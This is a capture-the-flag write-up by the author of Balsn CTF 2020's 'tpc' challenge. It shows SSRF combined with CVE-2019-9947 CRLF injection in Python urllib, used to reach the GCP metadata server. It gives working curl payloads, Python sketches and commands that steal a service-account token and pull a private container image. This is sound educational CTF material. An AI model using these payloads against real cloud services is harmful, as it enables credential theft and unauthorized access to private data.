Balsn CTF 2020 - tpc

TPC

Flag is in the working directory

http://35.194.175.80:8000

update: You don't need to use fuzzing tools to guess file names; the flag file name is unguessable.

Author: ysc

There are 4 things you need to do:

  • Recon: Find that the request is sent by Python 3.7 urllib and identify CVE-2019-9947, a CRLF injection vulnerability in urllib
  • Recon: Find that the website is deployed on Google Cloud Platform (GCP)
  • Dump info: Get the permission scopes and an access token from the GCP metadata server
  • Pull the image and read the flag

Recon: Python 3.7 urllib

In this challenge, you only get a message:

/query?site=[your website]

I think you quickly found that it's SSRF and tried to query internal IPs/ports/files. Nice try ;)

You can use the SSRF to read the source code and find that it uses Python urllib (ref: Super-Guesser's writeup). Alternatively, if you make the server send a request to a site you control (e.g. http://35.194.175.80:8000/query?site=https://hookb.in/JKmqjg2OKRuJPPWVoZVr), you will see the Python version in the User-Agent header: Python-urllib/3.7.

After you survey urllib, you will find CVE-2019-9947, a CRLF injection vulnerability in urllib, and it works in this challenge!
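
To see why this matters, here is a minimal sketch of the bug (my own reproduction, not the challenge's code, and it assumes the server does roughly urllib.request.urlopen(site) with the decoded parameter): on an unpatched Python 3.7, urllib does not reject control characters in the URL, so a decoded ?site= value containing a space and literal CR/LF ends up verbatim in the HTTP request line, letting you smuggle extra headers. It only resolves metadata.google.internal from inside a GCP instance, and patched Pythons will refuse the URL instead.

import urllib.request

# Sketch of CVE-2019-9947 on an unpatched Python 3.7: the space and CR/LF
# below are written into the request line as-is, so the injected
# "Metadata-Flavor: Google" header becomes part of the outgoing request.
site = ("http://metadata.google.internal/computeMetadata/v1/"
        " HTTP/1.1\r\n"
        "Metadata-Flavor: Google\r\n"
        "a: ")  # swallows the trailing " HTTP/1.1" that urllib appends
print(urllib.request.urlopen(site).read().decode())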

Recon: Google Cloud Platform (GCP)

But the CRLF vulnerability alone can't read the flag. If you read /etc/hosts (via http://35.194.175.80:8000/query?site=file:///etc/hosts) or run whois 35.194.175.80, you will find that the challenge is deployed on GCP.

GCP has a metadata server which, with the right permissions, can be abused for all sorts of things (e.g. getting more instance information, RCE, controlling GCP services, etc.).

If you send a request to the GCP metadata server via http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1beta1/ or the v0.1 API endpoint, you will get an Internal Server Error.

That's because the v1beta1 and v0.1 metadata server endpoints are deprecated and scheduled for shutdown (you can find this in the GCP metadata documentation). Note that the v1beta1 and v0.1 APIs were still available when I built the challenge, so I disabled them by setting disable-legacy-endpoints=TRUE in the instance metadata.

Now only the v1 metadata server works, but you need to provide the header Metadata-Flavor: Google in the request to query it.
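
For reference, this is how the v1 endpoint is normally queried from code running on the instance (a minimal urllib sketch; metadata.google.internal only resolves inside GCP, and without the header the request is rejected):

import urllib.request

# Normal v1 metadata query from inside an instance: the Metadata-Flavor
# header is mandatory, otherwise the metadata server refuses the request.
req = urllib.request.Request(
    "http://metadata.google.internal/computeMetadata/v1/",
    headers={"Metadata-Flavor": "Google"},
)
print(urllib.request.urlopen(req).read().decode())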

But wait, remember that we have a CRLF vulnerability? We can use SSRF + CRLF injection to add that header and query the GCP metadata server!

Dump info: GCP metadata

Here is an example of querying the GCP metadata server:

curl 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20'
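
If you don't want to hand-encode the payload for every path, here is a small hypothetical helper (the names are mine) that builds the ?site= value, assuming the server URL-decodes the query parameter as usual:

from urllib.parse import quote

# Hypothetical helper: wraps a v1 metadata path into the SSRF + CRLF payload.
# Only the space and CR/LF need percent-encoding; the injected "a: " header
# swallows the " HTTP/1.1" that urllib appends to the original request line.
def metadata_url(path):
    payload = ("http://metadata.google.internal" + path +
               " HTTP/1.1\r\nMetadata-Flavor: Google\r\na: ")
    return "http://35.194.175.80:8000/query?site=" + quote(payload, safe=":/")

print(metadata_url("/computeMetadata/v1/instance/attributes/gce-container-declaration"))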

After some recon, you will find that it's deployed on Compute Engine with a container:

$ curl 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/attributes/gce-container-declaration%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20'
spec:
  containers:
    - name: tpc-1
      image: 'asia.gcr.io/balsn-ctf-2020-tpc/tpc:v3.14'
      stdin: false
      tty: false
  restartPolicy: Always

# This container declaration format is not public API and may change without notice. Please
# use gcloud command-line tool or Google Cloud Console to run Containers on Google Compute Engine.

Oh, the image is on Google Container Registry (GCR) and the repository is asia.gcr.io/balsn-ctf-2020-tpc/tpc:v3.14, but do we have permission to pull it?

$ curl 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20'
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append

Yes we do! If you check the instance's service account, it has the devstorage.read_only scope, which is enough to pull all private images on GCR (image layers are stored in Cloud Storage)!

Pull image and get flag

Now you can use these commands to download image:

IMAGE=asia.gcr.io/balsn-ctf-2020-tpc/tpc:v3.14
TOKEN=$(curl -s 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20' | jq -r '.access_token')

docker login -u oauth2accesstoken -p "$TOKEN" https://asia.gcr.io
docker pull $IMAGE
docker run -it --rm --entrypoint /bin/sh $IMAGE

# /opt/workdir $ ls
# docker-entrypoint-dc1e2f5f7a4f359bb5ce1317a.sh  main-dc1e2f5f7a4f359bb5ce1317a.py  flag-6ba72dc9ffb518f5bcd92eee.txt  requirements.txt
# /opt/workdir $ cat flag-6ba72dc9ffb518f5bcd92eee.txt
# BALSN{What_permissions_does_the_service_account_need}
# /opt/workdir $ exit

docker logout asia.gcr.io
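
If you just want to confirm the token works without pulling the whole image, you can also hit the Docker Registry v2 API on GCR directly, reusing the same oauth2accesstoken basic-auth trick that docker login used above (a minimal sketch):

import base64, json, urllib.request

# Sketch: list the tags of the private repository with the stolen access
# token. GCR accepts HTTP Basic auth with the literal user "oauth2accesstoken".
token = "..."  # paste the access_token dumped from the metadata server
auth = base64.b64encode(f"oauth2accesstoken:{token}".encode()).decode()
req = urllib.request.Request(
    "https://asia.gcr.io/v2/balsn-ctf-2020-tpc/tpc/tags/list",
    headers={"Authorization": "Basic " + auth},
)
print(json.loads(urllib.request.urlopen(req).read()))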

Hope you enjoyed downloading images with a GCP token :)
